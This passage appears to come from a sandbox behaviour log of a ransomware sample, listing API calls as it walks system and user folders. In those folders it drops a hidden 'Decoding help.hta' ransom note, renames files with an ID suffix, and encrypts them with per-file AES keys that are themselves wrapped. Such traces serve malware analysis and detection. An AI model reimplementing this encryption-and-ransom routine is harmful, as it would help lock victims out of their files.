(in: hKey=0x5fca2e0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x2119fbe4, pdwDataLen=0x2119fce4 | out: pbData=0x2119fbe4*, pdwDataLen=0x2119fce4*=0x2c) returned 1 [0060.203] MapViewOfFile (hFileMappingObject=0xb4c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x140) returned 0x39c0000 [0064.207] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2119fbe4*, pdwDataLen=0x2119fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x2119fbe4*, pdwDataLen=0x2119fcf8*=0x100) returned 1 [0064.207] CryptEncrypt (in: hKey=0x5fca2e0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x39c0000*, pdwDataLen=0x2119fce4*=0x140, dwBufLen=0x140 | out: pbData=0x39c0000*, pdwDataLen=0x2119fce4*=0x140) returned 1 [0064.207] UnmapViewOfFile (lpBaseAddress=0x39c0000) returned 1 [0064.210] CloseHandle (hObject=0xb4c) returned 1 [0064.210] CryptDestroyKey (hKey=0x5fca2e0) returned 1 [0064.210] CryptReleaseContext (hProv=0x2aac5808, dwFlags=0x0) returned 1 [0064.210] SetFilePointerEx (in: hFile=0xb48, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0064.210] WriteFile (hFile=0xb48, lpBuffer=0x2119fbe4, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2119fcf8, lpOverlapped=0x0) Thread: id = 762 os_tid = 0x604 [0054.497] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\*.*", lpFindFileData=0x688fd30 | out: lpFindFileData=0x688fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x3235c810, ftLastAccessTime.dwHighDateTime=0x1d2fa9b, ftLastWriteTime.dwLowDateTime=0x3235c810, ftLastWriteTime.dwHighDateTime=0x1d2fa9b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d88d0 [0055.488] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0055.488] FindNextFileW (in: hFindFile=0x5d88d0, lpFindFileData=0x688fd30 | out: lpFindFileData=0x688fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x3235c810, ftLastAccessTime.dwHighDateTime=0x1d2fa9b, ftLastWriteTime.dwLowDateTime=0x3235c810, ftLastWriteTime.dwHighDateTime=0x1d2fa9b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.488] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0055.488] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0055.488] FindNextFileW (in: hFindFile=0x5d88d0, lpFindFileData=0x688fd30 | out: lpFindFileData=0x688fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x3235c810, ftLastAccessTime.dwHighDateTime=0x1d2fa9b, ftLastWriteTime.dwLowDateTime=0x3235c810, ftLastWriteTime.dwHighDateTime=0x1d2fa9b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0055.488] FindClose (in: hFindFile=0x5d88d0 | out: hFindFile=0x5d88d0) returned 1 Thread: id = 763 os_tid = 0x240 [0054.516] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nb_NO\\*.*", lpFindFileData=0x2129fd30 | out: lpFindFileData=0x2129fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5a6660, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5a6660, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5a6660, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db778 [0056.849] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.849] FindNextFileW (in: hFindFile=0x5db778, lpFindFileData=0x2129fd30 | out: lpFindFileData=0x2129fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5a6660, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5a6660, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5a6660, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.849] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.849] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.849] FindNextFileW (in: hFindFile=0x5db778, lpFindFileData=0x2129fd30 | out: lpFindFileData=0x2129fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d5a6660, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x15d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reader_10.0.helpcfg", cAlternateFileName="READER~1.HEL")) returned 1 [0056.849] lstrcpyW (in: lpString1=0x11304238, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nb_NO\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nb_NO\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nb_NO\\*.*" [0056.849] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nb_NO\\*.*") returned 63 [0056.849] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nb_NO\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nb_NO\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nb_NO\\Decoding help.hta" [0056.849] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nb_NO\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\nb_no\\decoding help.hta")) returned 0xffffffff [0056.849] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nb_NO\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\nb_no\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb3c [0058.342] WriteFile (in: hFile=0xb3c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2129fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2129fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.342] CloseHandle (hObject=0xb3c) returned 1 [0058.342] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nb_NO\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.343] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Reader_10.0.helpcfg") returned -1 [0058.343] lstrlenW (lpString="Reader_10.0.helpcfg") returned 19 [0058.343] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nb_NO\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nb_NO\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nb_NO\\*.*" [0058.343] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nb_NO\\*.*") returned 63 [0058.343] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nb_NO\\", lpString2="Reader_10.0.helpcfg" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nb_NO\\Reader_10.0.helpcfg") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nb_NO\\Reader_10.0.helpcfg" [0058.343] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nb_NO\\Reader_10.0.helpcfg" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nb_NO\\Reader_10.0.helpcfg") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nb_NO\\Reader_10.0.helpcfg" [0058.343] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nb_NO\\Reader_10.0.helpcfg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nb_NO\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nb_NO\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" [0058.343] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nb_NO\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\nb_no\\reader_10.0.helpcfg"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nb_NO\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\nb_no\\reader_10.0.helpcfg.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.344] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nb_NO\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\nb_no\\reader_10.0.helpcfg.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb3c [0058.344] CreateFileMappingA (hFile=0xb3c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xb40 [0058.344] CryptAcquireContextA (in: phProv=0x2129fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x2129fcec*=0x2aac5780) returned 1 [0060.203] CryptGenKey (in: hProv=0x2aac5780, Algid=0x6610, dwFlags=0x1, phKey=0x2129fce8 | out: phKey=0x2129fce8*=0x5fca2a0) returned 1 [0060.203] CryptExportKey (in: hKey=0x5fca2a0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x2129fbe4, pdwDataLen=0x2129fce4 | out: pbData=0x2129fbe4*, pdwDataLen=0x2129fce4*=0x2c) returned 1 [0060.203] MapViewOfFile (hFileMappingObject=0xb40, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x140) returned 0x39c0000 [0064.201] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2129fbe4*, pdwDataLen=0x2129fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x2129fbe4*, pdwDataLen=0x2129fcf8*=0x100) returned 1 [0064.201] CryptEncrypt (in: hKey=0x5fca2a0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x39c0000*, pdwDataLen=0x2129fce4*=0x140, dwBufLen=0x140 | out: pbData=0x39c0000*, pdwDataLen=0x2129fce4*=0x140) returned 1 [0064.201] UnmapViewOfFile (lpBaseAddress=0x39c0000) returned 1 [0064.204] CloseHandle (hObject=0xb40) returned 1 [0064.204] CryptDestroyKey (hKey=0x5fca2a0) returned 1 [0064.204] CryptReleaseContext (hProv=0x2aac5780, dwFlags=0x0) returned 1 [0064.204] SetFilePointerEx (in: hFile=0xb3c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0064.204] WriteFile (hFile=0xb3c, lpBuffer=0x2129fbe4, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2129fcf8, lpOverlapped=0x0) Thread: id = 764 os_tid = 0x310 [0054.497] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\*.*", lpFindFileData=0x788fd30 | out: lpFindFileData=0x788fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x243448f1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xae0e8854, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xae0e8854, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671d30 [0056.123] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.123] FindNextFileW (in: hFindFile=0x671d30, lpFindFileData=0x788fd30 | out: lpFindFileData=0x788fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x243448f1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xae0e8854, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xae0e8854, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.123] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.123] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.123] FindNextFileW (in: hFindFile=0x671d30, lpFindFileData=0x788fd30 | out: lpFindFileData=0x788fd30*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x2436abaa, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xabde2c6f, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa65a8bbf, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x2f22, dwReserved0=0x0, dwReserved1=0x0, cFileName="Help_CValidator.H1D", cAlternateFileName="HELP_C~1.H1D")) returned 1 [0056.123] lstrcpyW (in: lpString1=0x1133c310, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\*.*" [0056.123] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\*.*") returned 60 [0056.123] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Decoding help.hta" [0056.123] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\decoding help.hta")) returned 0xffffffff [0056.123] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x964 [0059.197] WriteFile (in: hFile=0x964, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x788fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x788fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0060.489] CloseHandle (hObject=0x964) returned 1 [0061.591] SetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Decoding help.hta", dwFileAttributes=0x1) returned 1 Thread: id = 765 os_tid = 0x7a8 [0054.498] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\*.*", lpFindFileData=0x1329fd30 | out: lpFindFileData=0x1329fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x29272c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x29272c20, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6710f0 [0055.676] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0055.677] FindNextFileW (in: hFindFile=0x6710f0, lpFindFileData=0x1329fd30 | out: lpFindFileData=0x1329fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x29272c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x29272c20, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.677] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0055.677] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0055.677] FindNextFileW (in: hFindFile=0x6710f0, lpFindFileData=0x1329fd30 | out: lpFindFileData=0x1329fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x298b9870, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x298b9870, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="x64", cAlternateFileName="")) returned 1 [0055.677] lstrcmpW (lpString1=".", lpString2="x64") returned -1 [0055.677] lstrcmpW (lpString1="..", lpString2="x64") returned -1 [0055.677] lstrcmpiW (lpString1="windows", lpString2="x64") returned -1 [0055.789] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\*.*" [0055.789] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\*.*") returned 96 [0055.789] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\", lpString2="x64" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64" [0055.789] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\*.*" [0055.790] GlobalMemoryStatus (in: lpBuffer=0x1329fd10 | out: lpBuffer=0x1329fd10) [0055.790] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2a9b0c18, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x830 [0055.802] CloseHandle (hObject=0x830) returned 1 [0055.802] FindNextFileW (in: hFindFile=0x6710f0, lpFindFileData=0x1329fd30 | out: lpFindFileData=0x1329fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x298b9870, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x298b9870, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="x64", cAlternateFileName="")) returned 0 [0055.802] FindClose (in: hFindFile=0x6710f0 | out: hFindFile=0x6710f0) returned 1 Thread: id = 766 os_tid = 0x734 [0054.498] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\*.*", lpFindFileData=0x864fd30 | out: lpFindFileData=0x864fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa989d730, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa989d730, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671370 [0055.677] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0055.677] FindNextFileW (in: hFindFile=0x671370, lpFindFileData=0x864fd30 | out: lpFindFileData=0x864fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa989d730, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa989d730, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.677] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0055.677] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0055.678] FindNextFileW (in: hFindFile=0x671370, lpFindFileData=0x864fd30 | out: lpFindFileData=0x864fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa989d730, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa989d730, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="x64", cAlternateFileName="")) returned 1 [0055.678] lstrcmpW (lpString1=".", lpString2="x64") returned -1 [0055.678] lstrcmpW (lpString1="..", lpString2="x64") returned -1 [0055.678] lstrcmpiW (lpString1="windows", lpString2="x64") returned -1 [0055.801] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\*.*" [0055.801] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\*.*") returned 96 [0055.801] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\", lpString2="x64" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64" [0055.801] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\*.*" [0055.801] GlobalMemoryStatus (in: lpBuffer=0x864fd10 | out: lpBuffer=0x864fd10) [0055.801] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2a9e0ce8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1b4 [0055.827] CloseHandle (hObject=0x1b4) returned 1 [0055.827] FindNextFileW (in: hFindFile=0x671370, lpFindFileData=0x864fd30 | out: lpFindFileData=0x864fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa989d730, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa989d730, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="x64", cAlternateFileName="")) returned 0 [0055.827] FindClose (in: hFindFile=0x671370 | out: hFindFile=0x671370) returned 1 Thread: id = 767 os_tid = 0x7a4 [0054.498] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\*.*", lpFindFileData=0x92cfd30 | out: lpFindFileData=0x92cfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f572ae0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f572ae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f572ae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671af0 [0054.499] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0054.499] FindNextFileW (in: hFindFile=0x671af0, lpFindFileData=0x92cfd30 | out: lpFindFileData=0x92cfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f572ae0, ftCreationTime.dwHighDateTime=0x1d2dd9e, 